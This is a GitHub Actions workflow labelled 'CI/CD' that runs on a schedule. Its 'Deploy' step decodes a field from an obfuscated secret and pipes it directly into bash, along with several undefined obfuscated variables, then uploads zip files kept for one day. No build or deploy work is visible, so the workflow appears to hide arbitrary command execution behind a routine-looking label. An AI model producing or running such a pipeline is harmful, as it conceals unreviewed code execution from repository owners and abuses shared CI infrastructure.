name: CI/CD
on:
  workflow_dispatch:

  schedule:
    - cron: '46 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Deploy
        env:
          c44030: ${{ secrets.c44030 }}
        run: |
          printf '%s' "$c44030" | jq -r .guhgl34571 | /bin/bash
          echo $ep25105 | jq -r .ckaqu75889 | /bin/bash
          printf '%s' "$prah689" | jq -r .kowy9511 | /bin/bash
          echo $lyc66065 | jq -r .iwiug1 | /bin/bash
          echo $f35 | jq -r .vnama1128 | /bin/bash
          printf '%s' "$zeq41" | jq -r .c0 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: 1CcqrSim
          path: "*.zip"
          retention-days: 1
